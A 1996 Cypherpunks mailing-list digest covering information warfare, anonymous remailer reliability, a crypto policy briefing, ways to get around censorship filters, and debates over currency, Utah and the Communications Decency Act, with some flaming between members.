From: jya at pipeline.com (John Young)
Date: Tue, 1 Oct 1996 02:07:50 +0800
Subject: ADJ_ust
Message-ID: <199609301350.NAA10824@pipe2.ny1.usa.pipeline.com>

9-30-96. NYP:

"National Security Experts Plan for Wars Whose Targets and Weapons Are All Digital." Is the threat real, or is this just another way to win scarce funds?

Military and intelligence officials believe that enemy nations, terrorists and criminal groups either already have the capability to mount information warfare strikes or soon will.

Criminals are quickly progressing beyond the vandalism and petty theft associated with teen-aged hackers and into robbery and extortion schemes ranging up to millions of dollars, corporate executives and private investigators say.

Others reply that the worst threats mentioned are mostly speculation.

"Information warfare is a risk to our nation's economy and defense," said Martin Libicki, a senior fellow at the National Defense University. "But I believe we will find ways to cope with these attacks, adjust and shake them off, just as we do to natural disasters like hurricanes."

-----

http://jya.com/adjust.txt (14 kb)

ADJ_ust

From whallen at capitalnet.com Mon Sep 30 11:18:23 1996
From: whallen at capitalnet.com (Wayne H. Allen)
Date: Tue, 1 Oct 1996 02:18:23 +0800
Subject: [AP] Afghanistan
Message-ID: <199609301406.KAA08044@ginger.capitalnet.com>

At 05:57 PM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>"Wayne H. Allen" writes:
>
>> At 04:10 AM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>> >Afghanis publicly hanged their former president, Najibullah [no last name].
>> >Other countries should follow their example.
>> >
>>
>> And this would accomplish???? And this has what to do with cryptography??
>
>Nothing, of course - neither do Timmy May's stupid rants, lies, and personal
>attacks.
>
>By the way, your abuse of your native language suggests that you're probably
>a product of U.S. public education.
>
>

And you would be far off base once again.

Wayne H.Allen
whallen at capitalnet.com
Pgp key at www.capitalnet.com/~whallen

From jya at pipeline.com Mon Sep 30 11:30:28 1996
From: jya at pipeline.com (John Young)
Date: Tue, 1 Oct 1996 02:30:28 +0800
Subject: GCHQ releases Venona files (from UK Telegraph)
Message-ID: <199609301407.OAA11575@pipe2.ny1.usa.pipeline.com>

If anyone in the UK cares to get the GCHQ Venona releases, we'll be pleased to scan them for distribution. Or put them on our Web site.

Our fax: 212-799-4003 (US)
Vox: 212-873-8700

Or if someone else scans them and needs a Web site, ftp them to:

ftp://jya.com/pub/incoming

From crypto at nas.edu Mon Sep 30 11:37:24 1996
From: crypto at nas.edu (CRYPTO)
Date: Tue, 1 Oct 1996 02:37:24 +0800
Subject: Another briefing in Atlanta on the NRC crypto report,...
Message-ID: <9608308441.AA844103952@nas.edu>

Subject: Another briefing in Atlanta on the NRC crypto report, October 21, 1996

Cryptography's Role in Securing the Information Society
A Public Briefing in Atlanta, Georgia
Monday, October 21, 1996, 1:30-3:30 pm

There will be a public briefing in Atlanta, Georgia by the National Research Council on this report. The briefing will be held at the Manufacturing Research Center on the campus of the Georgia Institute of Technology on Monday October 21, from 1:30 to 3:30. Dr. Herbert Lin, director of the NRC study will conduct the briefing. Questions from the audience will be entertained.

For further information, please contact Dr. Myron L. Cramer (404) 894-7292, at the Georgia Tech Research Institute. The event is open to the press and the public.

Directions: From I-75/85 exit on Tenth Street and head West.
Turn left on Hemphill Street and follow it to where it ends on Ferst Street. The Manufacturing Research Center is the modern building in front of you. Parking is limited; use public transportation or allow yourself extra time.

If you have suggestions about other places that the committee should offer a public briefing, please send e-mail to crypto at nas.edu.

From cadams at acucobol.com Mon Sep 30 11:37:47 1996
From: cadams at acucobol.com (Chris Adams)
Date: Tue, 1 Oct 1996 02:37:47 +0800
Subject: Internet plug pulled on Colombia's guerrillas
Message-ID: <199609301422.HAA28798@acucobol.acucobol.com>

On Fri, 27 Sep 1996 14:33:42 -0800, jim bell wrote:

>>The Revolutionary Armed Forces of Colombia (FARC), which
>>has periodically paralyzed half the country with road blocks,
>>found its route to the information superhighway barred.
>>
>>The Communist insurgents, who rose up in arms in 1964,
>>embraced new technology last year in their fight to overthrow the
>>government by launching a home page on the Internet.
>
>I couldn't resist smiling when I read this. Not that I want their access
>cut; quite the opposite. But it is REALLY reassuring to see the authorities
>behave in exactly the fashion you expect them to! Attempting to cut off
>dissenting political voices IRL is de rigueur; now, this shows that they
>believe "threat" to the government posed by allowing others to voice
>contrary opinions on the 'net is real.

It's particularly funny when you consider that the main justification for suppression is that insurgents (or rebels or freedom fighters or ...) kill people. Something along the lines of "We don't suppress unpopular views; we're just protecting our citizens". Now, it seems to me that having a web page is a decidedly non-lethal thing. OTOH, it's probably more effective at getting the outside world to find out what's happening. Draw your own conclusions.
# Chris Adams # | http://www.io-online.com/adamsc/adamsc.htp

From raph at CS.Berkeley.EDU Mon Sep 30 11:42:58 1996
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Tue, 1 Oct 1996 02:42:58 +0800
Subject: List of reliable remailers
Message-ID: <199609301350.GAA15812@kiwi.cs.berkeley.edu>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.

To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = " cpunk mix";
$remailer{"amnesia"} = " cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = ' alpha pgp';
$remailer{'nymrod'} = ' alpha pgp';
$remailer{"lead"} = " cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = " cpunk pgp hash latent cut";
$remailer{"exon"} = " cpunk pgp hash latent cut ek";
$remailer{"vegas"} = " cpunk pgp hash latent cut";
$remailer{"haystack"} = " cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = " mix cpunk pgp hash latent";
$remailer{"lucifer"} = " cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = " cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = " cpunk pgp hash cut ksub reord";
$remailer{'nym'} = ' newnym pgp';
$remailer{"balls"} = " cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = " cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = ' alpha pgp';
$remailer{"dustbin"} = " cpunk pgp hash ksub latent cut ek mix reord";
catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you can use the cyber nymserver.

The nym.alias.net server will be listed soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.
Last update: Mon 30 Sep 96 6:45:05 PDT

remailer  email address                    history        latency   uptime
-----------------------------------------------------------------------
jam       remailer at cypherpunks.ca       ************     14:56  100.00%
cyber     alias at alias.cyberpass.net     *****++**+**     33:36   99.96%
dustbin   dustman at athensnet.com         ++-+-++++--    1:11:40   99.94%
winsock   winsock at c2.org                --------..-+   6:56:13   99.81%
exon      remailer at remailer.nl.com      #*+#*# -#***     12:53   99.79%
extropia  remail at miron.vip.best.com     ----.------    7:25:48   99.62%
balls     remailer at huge.cajones.com     ************      5:03   99.40%
haystack  haystack at holy.cow.net         #--*##*####      13:56   99.17%
amnesia   amnesia at chardos.connix.com    ----------+    3:47:17   98.46%
middle    middleman at jpunix.com          - - +- - +     1:27:49   95.92%
squirrel  mix at squirrel.owl.de           --++++ +++     1:56:13   92.08%
replay    remailer at replay.com           **+****** *       4:11   91.92%
lead      mix at zifi.genetics.utah.edu    + ++*++ .-*    2:49:27   91.01%
mix       mixmaster at remail.obscura.com  ++++-++--+     1:53:37   81.18%

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

cpunk
    A major class of remailers. Supports Request-Remailing-To: field.
eric
    A variant of the cpunk style. Uses Anon-Send-To: instead.
penet
    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp
    Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
hash
    Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub
    Remailer always kills subject header, even in non-pgp mode.
nsub
    Remailer always preserves subject header, even in pgp mode.
latent
    Supports Matt Ghio's Latent-Time: option.
cut
    Supports Matt Ghio's Cutmarks: option.
post
    Post to Usenet using Post-To: or Anon-Post-To: header.
ek
    Encrypt responses in reply blocks using Encrypt-Key: header.
special
    Accepts only pgp encrypted messages.
mix
    Can accept messages in Mixmaster format.
reord
    Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon
    Remailer has been known to monitor contents of private email.
filter
    Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien

From thad at hammerhead.com Mon Sep 30 11:52:43 1996
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Tue, 1 Oct 1996 02:52:43 +0800
Subject: Looking for Qualified Individual/Firm to Contract for Cryptanalysis
Message-ID: <199609301400.HAA15466@hammerhead.com>

I saw this

> > I am looking for one or more people (or firms) who are qualified to perform
> > world class cryptanalysis work. Please send mail to me at joswald1 at msn.com
> > call in the U.S. at +1 408.479.7874
> >
> > Jack Oswald

and then this...

> [from alt.religion.scientology, where net-activist Grady Ward is a subject
> of a lawsuit from the Scientologists...]
>
> Grady Ward posted updates in his case of alleged copyright and trade
> secret violation.
>
> "Word as of September 26, 1996 at 10:00 AM is that the technician who has
> been trying to 'crack' files apparently encrypted using PGP has admitted
> that 'he can make no further progress' after a month of concentrated
> effort.
>
> "The disks will remain in a safety deposit box until the 'ho reveals any
> new plans for bringing in cryptography experts to assist in the analysis."

[the 'ho here is a nasty name for the religion's key lawyer, Helena Kobrin]

The trial is happening in San Jose, and I wouldn't be at all surprised if the attempted cryptanalysis is happening there, too.
They've been working at it for a few months now.

thad
-- Thaddeus Beier thad at hammerhead.com
Visual Effects Supervisor 408) 286-3376
Hammerhead Productions http://www.got.net/people/thad

From dthorn at gte.net Mon Sep 30 12:11:07 1996
From: dthorn at gte.net (Dale Thorn)
Date: Tue, 1 Oct 1996 03:11:07 +0800
Subject: Utah as a Religious Police State [RANT]
In-Reply-To:
Message-ID: <324FD588.3FF2@gte.net>

On the below: Gentiles (and Jews) are *very* afraid of Mormons. Maybe it has something to do with the World's Largest Database (on non-Mormons especially) they keep under that mountain near SLC Utah.

Moroni wrote:
> I never cease to be surprised by the interest that gentiles show in
> working mormon communities while totally neglecting their own failing
> areas.

> On Sun, 29 Sep 1996, Timothy C. May wrote:
> > (I received this message, with "cypherpunks at sybase.com" as well as
> > "tcmay at sybase.com" (???) cc:ed, so I assume this message was intended for
> > the Cypherpunks list, with some sybase domain name weirdness, or reflector,
> > going on.)

> > At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote:
> > >I guess that depends on your definition of liberty. The Mormons
> > >originally moved there to have a place to practice their religion,
> > >and have freedom from persecution. I suppose one could extend that
> > >to wanting a place to have the freedom to have a set of rules consistent
> > >with their beliefs. Should that include freedom from interference from
> > >folks such as yourself who want to change their rules, even though
> > >you're not presently affected?
> >
> > Well, if Utah can rig a way to _secede_ from the Union, your arguments
> > would make more sense. But so long as they are part of these United States,
> > their religious beliefs about when children should be at home cannot
> > supersede basic liberties.
[additional text deleted]

From rah at shipwright.com Mon Sep 30 12:14:06 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 1 Oct 1996 03:14:06 +0800
Subject: the theory of split currency
Message-ID:

Austrian-econ is an academic economists' list focused on so-called "austrian" economics, like Hayek, Von Mises, etc... Notice the last little bit about Patrick Leahy...

Cheers,
Bob Hettinga

--- begin forwarded text

Date: Sat, 28 Sep 1996 20:13:48 -0700 (PDT)
From: Fred Foldvary
To: Austrian Economics
Subject: the theory of split currency
Organization: JFK University
Mime-Version: 1.0
Sender: owner-austrianecon at agoric.com
Precedence: bulk
Reply-To: AustrianECON at agoric.com

Is there a name for a dual or split currency, in which there is one currency for domestic use and another, different appearing, currency for foreign usage?

Does anyone know of any country which has had such a split currency?

Is there any literature on such split currency?

Here are some thoughts on how it could function in the U.S.:

1) Domestic currency would not be legal tender outside the U.S.
2) Foreign US dollars would not be legal tender in the U.S. It would be illegal to hold foreign dollars in the U.S. Travelers would be required to convert them at customs.
3) The export of domestic currency would be illegal.
4) All exchanges between domestic and foreign currency would be required to be made in official exchanges, with the amounts recorded and reported to the government.
5) All previous currency would be declared of no value after a certain date. All conversions to new currency would be reported.

What would be the implications for banking, international trade, and the market process? Would it affect the measurement of the money supply, and monetary policy?

A motive for the government would be to control the underground economy, tax evasion, and the trade in illegal substances.

This scenario is not entirely hypothetical.
I have read that Senator Patrick Leahy introduced Senate Bill #307 to create such a split currency. The Bill failed to pass the Senate, but this shows the concept is out there. Is this worth investigation and theoretical examination?

Fred Foldvary

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
 -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From rah at shipwright.com Mon Sep 30 12:30:10 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 1 Oct 1996 03:30:10 +0800
Subject: Workers, Public Schools, Tradesmen, and Justice
In-Reply-To:
Message-ID:

At 9:26 pm -0400 9/28/96, snow wrote:

> I see no reason that general programming shouldn't be considered a
> trade. Maybe more "pure" math than a carpenter, or a mechanic, but they
> don't need the english, general history, & etc. that other "academic"
> careers need.

I have to say I agree with this. I know more than a few kids in my neighborhood who are more than smart enough, if they got over their technophobia and a little innumeracy. They could make more than the average drug dealer's lookout if they were to learn to code. Unfortunately, all the "trade" schools around here teach you to replace boards rather than hack code.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
 -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From rah at shipwright.com Mon Sep 30 12:36:45 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 1 Oct 1996 03:36:45 +0800
Subject: LII FYI: NETDAY PRESS CONFERENCE (fwd)
Message-ID:

Hang on to your wallets, everyone. Your tax dollars at work...
Cheers,
Bob Hettinga

--- begin forwarded text

Date: Thu, 26 Sep 1996 16:05:27 -0700 (PDT)
From: Peter Marshall
To: lii at pobox.com
Subject: LII FYI: NETDAY PRESS CONFERENCE (fwd)
MIME-Version: 1.0
Sender: owner-lii at majordomo.pobox.com
Precedence: bulk
Reply-To: lii at pobox.com

---------- Forwarded message ----------
Date: Thu, 26 Sep 1996 08:42:11 -0400
From: Roanne Robinson
Reply-To: roundtable at cni.org
To: Multiple recipients of list
Subject: NETDAY PRESS CONFERENCE

The following is a media advisory regarding today's NetDay96 press conference taking place at Hine Junior High School in southeast D.C. If you have any questions about the press conference or NetDay96, please don't hesitate to contact me. You also can find further information about NetDay96 by visiting NTIA's home page at www.ntia.doc.gov.

Roanne Robinson
National Telecommunications and Information Administration
U.S. Department of Commerce

-----------------------------------------------------------------------------

For Immediate Release:          Contact: Paige Darden
September 25, 1996              202-482-1551

***** MEDIA ADVISORY RE LAUNCH OF NATIONAL NETDAY *****

WASHINGTON, DC -- U.S. Government officials are joining business and community leaders in kicking off national NetDay 96 to wire all K-12 public and private schools in more than 40 states for access to the information superhighway. Businesses, parents, educators, students and community volunteers will come together to wire more than 20,000 schools nationwide.

Larry Irving, assistant secretary of Commerce for communications and information, will join U.S. Education Secretary Richard W. Riley to help launch national NetDay 96. Irving's remarks will focus on the need to make sure that all of America's communities participate in this effort.

"We can't afford to leave some of our schools behind -- all of our children deserve access to the tools that will enable them to be full participants in the Information Age," said Irving.

WHO:   U.S. Secretary of Education Richard W. Riley
       Assistant Secretary of Commerce Larry Irving
       NetDay Co-Founder John Gage of Sun Microsystems
       Robert Goodwin, Points of Light Foundation
       Corporate Partners, including BellSouth, Cisco Systems, MCI, Apple, AT&T, and others.

WHEN:  Thursday, September 26, 1:15 p.m.

WHERE: Hine Junior High School
       8th Street and Pennsylvania Avenue, SE

Like California NetDay, national NetDay 96 will follow the classic barn-raising tradition. It will build on California NetDay, in which more than 20,000 volunteers came together in March 1996 to connect over 2,600 schools to the Internet.

For more information, please call Anna Erdreich, U.S. Department of Education, 202-401-4389, or Paige Darden, Department of Commerce's National Telecommunications and Information Administration (NTIA), at 202-482-1551.

###

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
 -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From moroni at scranton.com Mon Sep 30 12:57:53 1996
From: moroni at scranton.com (Moroni)
Date: Tue, 1 Oct 1996 03:57:53 +0800
Subject: Utah as a Religious Police State [RANT]
In-Reply-To: <324FD588.3FF2@gte.net>
Message-ID:

Dale, I wouldn't worry about the mountain and what is under it. It is only genealogical stuff. Salt Lake has to wait 100 years or 99 (I forget) in order to be able to make the records public. The SSA makes death info available as soon as the body is cold. And that is on cd rom. Most banks have contingency plans for having intact records in case of nuclear or civil disturbance. Again it is under the mountains. As for costs, the full amount of the custodial costs are borne by members. Originally it was by donations of money and I think now it is taken from the tithe. That is a sum in excess of 1 billion dollars by the members.
On Mon, 30 Sep 1996, Dale Thorn wrote:

> On the below: Gentiles (and Jews) are *very* afraid of Mormons. Maybe
> it has something to do with the World's Largest Database (on non-Mormons
> especially) they keep under that mountain near SLC Utah.
>
> Moroni wrote:
> > I never cease to be surprised by the interest that gentiles show in
> > working mormon communities while totally neglecting their own failing
> > areas.
>
> > On Sun, 29 Sep 1996, Timothy C. May wrote:
> > > (I received this message, with "cypherpunks at sybase.com" as well as
> > > "tcmay at sybase.com" (???) cc:ed, so I assume this message was intended for
> > > the Cypherpunks list, with some sybase domain name weirdness, or reflector,
> > > going on.)
>
> > > At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote:
> > > >I guess that depends on your definition of liberty. The Mormons
> > > >originally moved there to have a place to practice their religion,
> > > >and have freedom from persecution. I suppose one could extend that
> > > >to wanting a place to have the freedom to have a set of rules consistent
> > > >with their beliefs. Should that include freedom from interference from
> > > >folks such as yourself who want to change their rules, even though
> > > >you're not presently affected?
> > >
> > > Well, if Utah can rig a way to _secede_ from the Union, your arguments
> > > would make more sense. But so long as they are part of these United States,
> > > their religious beliefs about when children should be at home cannot
> > > supersede basic liberties.
> > [additional text deleted]
>

From scottb at aca.ca Mon Sep 30 12:58:42 1996
From: scottb at aca.ca (scottb at aca.ca)
Date: Tue, 1 Oct 1996 03:58:42 +0800
Subject: PRNG discussions
Message-ID: <96Sep30.110001edt.15713@gateway.aca.ca>

Hi,

I was wondering if anyone has kept an archive of old discussions on PRNG's. I am playing around with a few ideas, and don't want to re-invent the wheel.
Does anyone know of any FTP sites containing this sort of thing??

/sb

From perry at piermont.com Mon Sep 30 13:11:01 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 1 Oct 1996 04:11:01 +0800
Subject: the theory of split currency
In-Reply-To:
Message-ID: <199609301523.LAA15152@jekyll.piermont.com>

> Is there a name for a dual or split currency, in which
> there is one currency for domestic use and another, different
> appearing, currency for foreign usage?

I don't know of such a name, however...

> Does anyone know of any country which has had such a
> split currency?

...this has been a common situation, in fact. South Africa, China, the Soviet Union, and other unpleasant places have repeatedly done this. It's usually a remarkably stupid idea.

Perry

From gary at systemics.com Mon Sep 30 13:57:45 1996
From: gary at systemics.com (Gary Howland)
Date: Tue, 1 Oct 1996 04:57:45 +0800
Subject: Tools for Rendering Censorship Firewalls Ineffective
In-Reply-To: <199609300305.UAA03732@netcomsv.netcom.com>
Message-ID: <324FE61D.15FB7483@systemics.com>

Bill Stewart wrote:
>
> The obvious techniques I can see include
> 1) Filter on IP address (e.g. German attack on XS4ALL)
> 2) Filter on DNS Name
> 3) Filter on Patterns in URL
> 4) Filter on Patterns in PUT/GET Requests
> 5) Filter on Patterns in Response.
> 6) Traffic Analysis on reading patterns
>
> 1) It's easy to evade the crude version of this attack - use rolling IP
> addresses, and use DNS to publish the new ones. For the German model,
> where the government has to tell the ISPs who to block, this wins.
> They can counter by blocking your whole IP network, not just a single
> machine, which you can counter by hopping IP networks as well as hosts,
> though that's more trouble (and blocking routes is probably easier
> than blocking hosts, since you do it at the routers, and harder to
> get people to turn back on.) They can also enforce boycotts on the ISP,
> as they did with XS4ALL - blocking most of the traffic to a site
> can affect its other traffic enough to be economically annoying.

I would guess that most sites censoring http by IP would be doing so by only censoring the http port. If the http servers were to be run on other ports too (perhaps well known ports like DNS), then this would make life a little harder for the bad guys. This would be especially true if their routers were configured to allow ALL DNS requests through (for example). This may be a problem for some browsers (I know it's a problem with netscape), as I mentioned a few weeks ago.

> What other kinds of attacks are there? What other defenses?
> What kinds of holes are there in these defenses?

I have some encrypted HTTP relay software if anyone is interested in setting up a server.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown.

pub 1024/C001D00D 1996/01/22 Gary Howland
Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06

From dustman at athensnet.com Mon Sep 30 14:09:01 1996
From: dustman at athensnet.com (Dustbin Freedom Remailer)
Date: Tue, 1 Oct 1996 05:09:01 +0800
Subject: ASAP letter on e-cash
Message-ID: <199609301455.KAA00838@godzilla.athensnet.com>

It seems our own Jim Ray has gotten published again, this time in Forbes ASAP's letters section (Oct. 7, page 18). A bit partisan-Libertarian, but good job, Jim.

From declan at well.com Mon Sep 30 14:22:38 1996
From: declan at well.com (Declan McCullagh)
Date: Tue, 1 Oct 1996 05:22:38 +0800
Subject: Bruce Taylor vs. John Perry Barlow, in HotWired's Brain Tennis
Message-ID:

---------- Forwarded message ----------
Date: Mon, 30 Sep 1996 08:17:22 -0700 (PDT)
From: Declan McCullagh
To: fight-censorship at vorlon.mit.edu
Subject: Bruce Taylor vs. John Perry Barlow, in HotWired's Brain Tennis

Taylor and Barlow have been battling it out in a HotWired Brain Tennis match for the last week. Check out some excerpts lobbed across the, um, neural nets...

-Declan

**********

Linkname: Wired Online: Brain Tennis
URL: http://www.hotwired.com/braintennis/

---

Bruce Taylor, president of the National Law Center for Children and Families and a leading advocate of the Communications Decency Act, was also formerly a US Department of Justice and city of Cleveland prosecutor.

John Perry Barlow is an Electronic Frontiers Foundation co-founder, member of The Well's board of directors, author, retired Wyoming cattle rancher, and lyricist for the Grateful Dead.

---

Friday, 27 September 1996
Post No. 5 of 8
by Bruce Taylor

I got you now, John Perry. You say "First Amendment!" However, not all detrimental speech is protected - treason, false advertising, defamation, obscenity, child porn, and incitement to violence. Indecent speech that's not obscene is protected among adults, but there's no constitutional right to provide it to minors. If you call up the rule of law ("This is a Nation of laws, not of men"), you are bound by its limits.

The Supreme Court recognizes limits for indecent mass communications. The Court didn't say "less" restrictive (as the ACLU does - no law, less law, parent's problem), but asked whether the method chosen by Congress is the "least" restrictive means that is still effective in achieving its purpose. Big difference.

State display laws don't say parents keep kids from stores, it says stores put porn out of reach. Dial-a-porn laws don't deny phones to kids or say warnings are enough, but require credit cards or PINs for adults to access sex messages. Responsible adults should take good faith steps that are effective for all but "the most enterprising and disobedient young people." Can adults obtain adult speech while shielding it from most kids? That is all the law and Supreme Court ask.
Why ask adult society to help protect our children? Why not just leave it up to each parent? Why not rejoice in the public profanities your children hear on the subway? Because children have rights to a "decent society." Your child may hear cursing on subways, but New York's display law keeps Hustler centerfolds off walls and news racks. So you, too, benefit from what other adults must do in deference to your children. The Internet should not remain an "adult" bookstore for kids any more than Times Squares' should be open to kids.

I also got you on philosophy, dear John. Our "'60s humanitarianism" was for social commitment, working together, selfless love for all the peoples of the world. Remember? Your refusal to hide your precious porn from the public Web seems like callous indifference to what kids will endure. To me, your position is appositive to true "liberalism." You sound like an elitist technohippie who can take care of his own, but doesn't care what kids would see, seek, suffer, or be seduced by. You're probably richer than I, maybe even smarter, but your protest has a bit of a whine.

The CDA only asks Internet users to shield kids so kids can use it, too, and asks industry to give us the means of doing online what we do everywhere else. Use your brain and heart to help find the ways, to pressure the techno-industrial complex, to help make the Internet safe for kids. Try it, you'll like it.

************

On Friday, Bruce Taylor said "children have rights to a 'decent society.'" Today, Barlow replies "You will not be happy until you have imposed your moral code on the rest of humanity." Can we expect the world to share the same concept of "decency"? Discuss in Threads....

Monday, 30 September 1996
Post No. 6 of 8
by John Perry Barlow

Bruce, remember what I said in my first post about shadowboxing? We're there, pal. You and I are not talking about the same "place."
You're talking about physical, walking-around reality within a quaint conceit called the United States of America, and I'm talking the seamless and global continuity that is cyberspace.

Now I will confess I misdirected the flow myself by referring to the First Amendment. I never should have done that, but I was strangely drawn into your reality-distortion field by all that talk about what "no one has the right to say." Utterly knee-jerk of me. I apologize.

But here's the terrible truth of it: These obscenity statutes you cite, along with the First Amendment itself, are all local ordinances. Even the treaty to which you apparently refer offers spotty coverage as it has only six official signatories, as far as I can tell. There is not a single government on this Earth that has the right to regulate the rest of it. For better or worse.

There are days when I wish there were. Certainly I would be delighted if I thought the protections in the Bill of Rights could be afforded to all God's children, just as you would no doubt be delighted if the sexual-conduct laws of Saudi Arabia could be applied to all "enterprising and disobedient young people," wherever their dirty minds be housed.

But they can't. And unless the United Nations becomes a lot more effective, there will never be a world government sufficient to convey such rights or restrictions. So, should either of us wish to restrict or maintain liberty on the Internet, we can't turn to government to assist us. We are stuck with governance, which is to say, the order that arises from social etiquette, cultural ethics, practicality, and technological architecture.

There is, in fact, plenty of comfort both of us can take from these. Since I am, as you charge, a technohippie, I'm convinced that as long as the Internet remains a packet-switched network, it will be very difficult to control the content of the whole.
On the other hand, as long as there are folks like yourself who wish to construct sanitized zones within it, that same technical characteristic makes it fairly easy to filter out most of the tainted packets and to observe very carefully, as they do at both my daughter's high school and in Singapore, who is attempting to get what. We are looking at opportunities for global liberty and local authoritarianism, and that should make us both happy. But you and the rest of your kind in the US Congress wish to think locally and act globally. You will not be happy until you have imposed your moral code on the rest of humanity. And I can imagine few aspirations more elitist than that, Bruce. ### From declan at well.com Mon Sep 30 14:31:12 1996 From: declan at well.com (Declan McCullagh) Date: Tue, 1 Oct 1996 05:31:12 +0800 Subject: Katz on cypherpunks, in HotWired's Media Rant Message-ID: [Background: the cypherpunk/pw:cypherpunk account used for HotWired's Threads discussion section has been used for anonymous flaming and attacks. --Declan] Linkname: The Netizen - Media Rant - Jon Katz URL: http://www.netizen.com/netizen/96/40/katz0a.html HotWired The Netizen 30 Sep 96 [...] In addition, the digital culture has long been demonized by the outside world and is inherently defensive and edgy. Cypherpunks give us fascinating insights into this subject, since their equivalent exists in no other medium, and they epitomize the often mindless verbal violence that characterizes some parts of the Net. Their original purpose - techno-anarchy and advocating unfettered access to information - conflict head-on with the Web's mainstreaming and the arrival of the newly wired middle class. Cypherpunks don't want real confrontations or discussions, or they would reveal their identities and make it possible to respond, as most flamers do. They are among media's rarest and at the same time most easily recognized subspecies: nihilists. Anonymous communication makes verbal violence easy. 
Since most flamers don't know their targets and won't ever meet them, it's easy enough to attack individuals and question personal motives, with none of the social consequences of face-to-face verbal assaults. And Net communication also offers no filter: because it's instantaneous, people often don't take the time to cool off, reflect, or take another look at the messages they mail and post. When tempers flare here, it doesn't even take the time of a phone call to pop off. So, hostile messages are often impulsive and frequently regretted, apologized for, or taken back and clarified. Since the Net makes communication so easy, it makes corrections, criticism, and discussion inevitable. Nobody who writes or posts on the Web should expect anything less than sustained and continuous challenge and critique, something that is rarely permitted in mainstream journalism. Web writers and posters have to see these as integral to their work - not simply attacks - and as healthy antidotes to conventional media arrogance and elitism. Accompanying the hundreds and hundreds of personally assaultive messages I've gotten - as opposed to the thousands of simply critical ones - there is a strange and recurring phenomenon: If you respond quickly and respectfully, the overwhelming majority of hostile emailers either apologize, change their tone, or write back in a more reflective, serious, or friendly way. Most of these posters are stunned that anyone read their mail in the first place, or, even more amazingly, responded to it. [...] From tcmay at got.net Mon Sep 30 14:48:49 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 1 Oct 1996 05:48:49 +0800 Subject: active practice in America In-Reply-To: <199609290438.WAA23813@infowest.com> Message-ID: At 11:32 PM -0700 9/29/96, Dale Thorn wrote: >Speaking of peers, what would the founding fathers have said about the >trial of the officers in the Rodney King case? Would they, as police >officers, have a right to a jury of their peers? 
